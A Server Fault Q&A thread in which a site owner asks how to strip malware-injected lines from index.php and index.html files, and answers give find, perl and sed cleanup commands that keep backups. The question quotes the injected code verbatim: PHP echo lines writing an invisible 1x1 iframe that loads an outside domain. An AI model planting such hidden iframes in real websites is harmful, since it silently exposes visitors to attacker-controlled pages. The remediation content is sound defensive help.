Search for index.php and index.html and replace string
I recently had some sort of malware on my computer that added the following string(s) to all index.php and index.html files ON THE WEB SERVER:

echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";
echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

The parameter after "click=" always changes; these two are only examples. Is there a quick way to remove these lines?

EDIT: It is on my web server (FTP), so find is of no use...

Tags: ftp, replace
asked Jul 18 '09 at 0:17 by Jonas (edited May 21 at 13:50 by yagmoth555♦)
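For reference, a pattern along these lines should match both sample lines despite the changing click ID (the character class is an assumption based on the two examples above, not something from the original post):

grep -rlE 'fabujob\.com/\?click=[A-Za-z0-9]+' /path/to/local/copy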
You want to do what the malware is doing? – random, Jul 18 '09 at 8:29
No. I want to remove the line! – Jonas, Jul 18 '09 at 15:54
5 Answers
one easy way to do this is by using find and grep, plus perl to do the edits.
first, construct a list of filenames that have been compromised:
find /path/to/web/site \( -name 'index.htm*' -o -name 'index.php' \) -print0 |
  xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt
next, use perl to edit the files and remove the exploit:
cat /tmp/compromised-files.txt |
  xargs -d '\n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'
(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)
that will delete every line containing the string "fabujob.com" from each of the compromised files. it will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete the backups when you no longer need them.
this perl script is based on the sample you gave, which appears to indicate that the attack added an entire line containing the exploit, so the script prints every line EXCEPT those containing the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)
this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text-manipulation capabilities.
BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
answered Jul 18 '09 at 1:40 by cas
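As a follow-up to the backup note above, a minimal sketch (not part of the original answer) for checking that nothing still references the exploit domain and then dropping the .BAK files, using the same paths as the commands above:

# confirm nothing under the site still references the exploit domain
grep -rl 'fabujob\.com' /path/to/web/site || echo "looks clean"
# once satisfied, remove the backups left behind by the perl run
find /path/to/web/site -name '*.BAK' -delete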
Thanks for this extraordinarily awesome answer, but unfortunately I forgot to say that it is on my web server (FTP), not on my local computer. – Jonas, Jul 18 '09 at 16:10
if you can run CGI or PHP scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your document root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first. – cas, Jul 18 '09 at 23:02
alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea. – cas, Jul 18 '09 at 23:03
Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you! – Jonas, Jul 18 '09 at 23:22
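A rough sketch of the download-clean-reupload workflow described in the two comments above; the host and paths are placeholders, and it assumes rsync-over-SSH access rather than plain FTP:

# pull a working copy of the whole site down
rsync -av user@example.com:/var/www/site/ ./site-local/
# clean the local copy with the same perl one-liner as in the answer
find ./site-local \( -name 'index.htm*' -o -name 'index.php' \) -print0 |
  xargs -0 perl -n -i.BAK -e 'print unless m/fabujob\.com/i'
# push the cleaned files back up, leaving the .BAK backups behind locally
rsync -av --exclude='*.BAK' ./site-local/ user@example.com:/var/www/site/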
sed and find should help you, but sed takes some time to learn (enough that I can't come up with a workable command off the top of my head right now).
Also, there are GUI editors that are capable of find and replace across a whole directory tree (e.g. TextMate on the Mac). You would then use a regex to cover the variable part.
answered Jul 18 '09 at 0:28 by Sven♦
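For the record, the sed route would look roughly like this (essentially what Dan Carley's answer below spells out; treat it as a sketch rather than a tested command):

find /path/to/docroot \( -name 'index.html' -o -name 'index.php' \) \
  -exec sed -i.bak '/fabujob\.com/d' {} +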
Try regexxer or rpl type tools. Their whole purpose is project-wide replacements. They support recursive directories and let you choose the file types to which the replacement should be applied.
answered Jul 18 '09 at 3:31 by Saurabh Barjatiya
Assuming that the domain is always the same and shouldn't legitimately exist anywhere:
find <documentroot> \( -name 'index.html' -or -name 'index.php' \) \
  -exec sed -i'.bak' '/fabujob.com/d' {} \;
Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.
answered Jul 18 '09 at 9:44 (edited Jul 18 '09 at 10:31) by Dan Carley
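If something does go wrong, a hypothetical way to roll back using those .bak copies (each backup is renamed back over the edited file; <documentroot> is the same placeholder as above):

find <documentroot> -name '*.bak' -print0 |
  while IFS= read -r -d '' f; do
    mv -- "$f" "${f%.bak}"   # restore the original over the edited copy
  done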
If you know you have no <iframe> tags in your documents, you can simply do
perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)
If you do have iframes, then you'll need to make your regex more exact.
Perl's -i flag is far too often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
answered May 3 '10 at 18:46 by Andy Lester
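A slightly more defensive variant (my rewording, not the author's exact command): dropping the closing > lets the regex match injected tags that carry attributes, it also covers index.php, and using find -exec avoids the word-splitting pitfalls of $(find ...):

find . \( -name 'index.html' -o -name 'index.php' \) \
  -exec perl -i -n -e 'print unless /<iframe/' {} +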